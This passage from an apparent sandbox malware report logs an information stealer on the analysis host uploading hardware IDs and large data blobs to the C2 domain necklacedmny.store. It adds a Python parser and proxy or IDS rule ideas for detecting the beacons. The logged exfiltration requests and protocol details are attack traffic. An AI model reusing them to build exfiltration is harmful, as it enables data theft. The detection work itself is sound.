    server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13782&delivery_rate=1735170&cwnd=248&unsent_bytes=0&cid=b22114e67ec9c44c&ts=760&x=0"
2024-10-31 10:27:54 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
    Data Ascii: 11ok 173.254.250.77
2024-10-31 10:27:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
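
The three sessions above show the stages of the conversation with necklacedmny.store: a bare `act=life` check-in answered with a chunked `ok`, an `act=recive_message` request carrying the build identifier (`lid`) and version (`ver=4.0`) answered with a large chunked blob, and a multipart POST carrying `hwid`, `pid` and `lid` answered with `ok 173.254.250.77`. As an added example, not code from the report or from the malware, the following Python parses those messages and reassembles the chunked responses from raw bytes. The request and response bytes are reconstructed from the hex dumps above with the response headers trimmed; the multipart body is truncated in the report, so only its three visible fields are rebuilt, with the `lid` value completed from session 1. All function names are this example's own.

```python
"""Parse the LummaC-style C2 messages seen in the HTTP sessions above.

Added example for this report, not code from the report or the malware.
Message bytes are reconstructed from the report's hex dumps; the multipart
body is truncated there, so only the three visible fields are rebuilt
(lid completed from session 1). Names below are this example's choices.
"""
import re
from urllib.parse import parse_qs

CHROME_119_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
BOUNDARY = b"--be85de5ipdocierre1"

# --- constructed samples (headers trimmed to the ones the parser uses) ---
REQ_LIFE = (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"User-Agent: " + CHROME_119_UA.encode() + b"\r\n"
            b"Content-Length: 8\r\nHost: necklacedmny.store\r\n\r\nact=life")
REQ_RECV = (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"User-Agent: " + CHROME_119_UA.encode() + b"\r\n"
            b"Content-Length: 52\r\nHost: necklacedmny.store\r\n\r\n"
            b"act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=")
REQ_EXFIL = (b"POST /api HTTP/1.1\r\n"
             b"Content-Type: multipart/form-data; boundary=be85de5ipdocierre1\r\n"
             b"User-Agent: " + CHROME_119_UA.encode() + b"\r\n"
             b"Host: necklacedmny.store\r\n\r\n"
             + BOUNDARY + b'\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
             b"959296B203B62E7243843ECDF4EBEF54\r\n"
             + BOUNDARY + b'\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
             + BOUNDARY + b'\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
             b"4SD0y4--legendaryy\r\n" + BOUNDARY + b"--\r\n")
RESP_HDR = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
            b"Transfer-Encoding: chunked\r\nConnection: close\r\n"
            b"Server: cloudflare\r\n\r\n")
RESP_ACK = RESP_HDR + b"2\r\nok\r\n0\r\n\r\n"                       # session 0
RESP_ACK_ADDR = RESP_HDR + b"11\r\nok 173.254.250.77\r\n0\r\n\r\n"   # session 2


def split_http_message(raw):
    """Return (start line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body):
    """Reassemble a Transfer-Encoding: chunked body; chunk sizes are hex."""
    out = b""
    while body:
        size_line, _, rest = body.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            break
        out += rest[:size]
        body = rest[size + 2:]                      # skip the chunk's CRLF
    return out


def parse_multipart(body, boundary):
    """Return {field: value} for the form-data parts (values as str)."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        m = re.search(rb'name="([^"]+)"\r\n\r\n(.*?)(?:\r\n|$)', part, re.S)
        if m:
            fields[m.group(1).decode()] = m.group(2).decode("latin-1")
    return fields


def classify_lumma_request(raw):
    """Describe a LummaC-style beacon (stage plus extracted ids), or None."""
    start, hdr, body = split_http_message(raw)
    if not start.startswith("POST /api "):
        return None
    info = {"chrome_ua": hdr.get("user-agent") == CHROME_119_UA}
    ctype = hdr.get("content-type", "")
    if ctype == "application/x-www-form-urlencoded":
        form = {k: v[0] for k, v in
                parse_qs(body.decode("latin-1"), keep_blank_values=True).items()}
        if form.get("act") in ("life", "recive_message"):
            info.update(stage=form["act"], lid=form.get("lid"), ver=form.get("ver"))
            return info
    elif ctype.startswith("multipart/form-data; boundary="):
        fields = parse_multipart(body, ctype.split("boundary=", 1)[1])
        if all(k in fields for k in ("hwid", "pid", "lid")):
            info.update(stage="exfil", hwid=fields["hwid"],
                        pid=fields["pid"], lid=fields["lid"])
            return info
    return None


def parse_lumma_response(raw):
    """Classify the reply: bare ack, ack carrying an address, or a data blob."""
    _, hdr, body = split_http_message(raw)
    if hdr.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    text = body.decode("latin-1")
    if text == "ok":
        return {"kind": "ack"}
    m = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", text)
    if m:
        return {"kind": "ack", "address": m.group(1)}
    return {"kind": "blob", "length": len(body)}   # e.g. the reply to recive_message


if __name__ == "__main__":
    for req in (REQ_LIFE, REQ_RECV, REQ_EXFIL):
        print(classify_lumma_request(req))
    print(parse_lumma_response(RESP_ACK), parse_lumma_response(RESP_ACK_ADDR))
```

The same checks translate directly to a proxy or IDS rule: a POST to `/api` whose form body has `act=life` or `act=recive_message`, a `lid` value repeated across requests from one host, and a multipart upload carrying `hwid`, `pid` and `lid` fields. The chunk decoder matters because the sandbox shows the bodies as raw chunks (`2\r\nok\r\n`, `11\r\nok 173.254.250.77\r\n`); a rule that matches on `ok` at the start of the body will miss them unless the transport framing is stripped first.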


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | 6764 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:27:55 UTC | 284 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15082
    Host: necklacedmny.store
2024-10-31 10:27:55 UTC | 15082 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-31 10:27:55 UTC | 1014 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 10:27:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=2jkdk5f9er3mema7ov5flj5d5k; expires=Mon, 24-Feb-2025 04:14:34 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aL2ZpLmi0aVckMacL%2BgpJ5PeeD6AD78YKRD6p6gH5f3849UiXf%2BxJp57Yj4kkTHg8ellMQpRAZNAaT2DOsYRaDn3fXgWA2CZ5Tgpzc3Ct9bnxchiztueCrJJorj92AkrxC4qwNU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f48eeec26b41-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2421404&cwnd=250&unsent_bytes=0&cid=5e319a91cc981531&ts=561&x=0"
                                                                2024-10-31 10:27:55 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49709 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6764 | Process: C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-31 10:27:56 UTC284OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 20572
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:27:56 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                2024-10-31 10:27:57 UTC1026INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=9q6lsg2qod0hg98kjrlch0mrq2; expires=Mon, 24-Feb-2025 04:14:36 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hph28IEBgp%2B%2F4uk00DaoY8CcVutmfYKklLvmjkHItY8vzo4A7fAuIaM5nm%2F476fsBRAo70MQ96ezLkPfOa%2B%2FulZiADMQkXXiIzTD0DsvMpbVQE7n%2BldwoI%2Fs%2BoSVPWrFZ8VxscQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f497a9f9ddb3-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21536&delivery_rate=2458404&cwnd=73&unsent_bytes=0&cid=eeba379d281e7e3a&ts=672&x=0"
                                                                2024-10-31 10:27:57 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49710 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6764 | Process: C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-31 10:27:58 UTC283OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 1237
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:58 UTC1237OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:27:59 UTC1020INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=89p9sgt8v1avlg2dsbru8mgp00; expires=Mon, 24-Feb-2025 04:14:37 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3ULTk5bLdg789F9giEdX%2FBAvGj9IYvRtwFQqzJq6E3cyoBx16pYs5%2FdSM5rODuclmCuyEVa9Phv0yGJzsOhJPSLw9%2FAjWUi4jq%2BmDBiLUsC4Ja8FwTxJBSzhc%2FEUIsq98rvf%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f4a22e8946d4-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2156&delivery_rate=2296590&cwnd=252&unsent_bytes=0&cid=fec1897ecad1465f&ts=793&x=0"
                                                                2024-10-31 10:27:59 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49711 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6764 | Process: C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-31 10:28:00 UTC285OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 570133
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: fe c0 02 4d 72 02 68 56 18 b8 0c 02 7f 95 56 0c 22 c1 0b 7b a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be 01
                                                                Data Ascii: MrhVV"{Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: d4 2d 58 b5 76 89 c2 5e b0 df 45 0a b0 10 00 77 a8 ea e1 f2 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29 d8
                                                                Data Ascii: -Xv^Ewh1JF^\H*Qy6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|zTG)
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 71 ed df 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06 0a
                                                                Data Ascii: qen;|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 8a 8f 7a bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9 cf
                                                                Data Ascii: zxvDg)rfH\W-*^5vE*!/W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: bc 9d a3 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00 a2
                                                                Data Ascii: = qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9
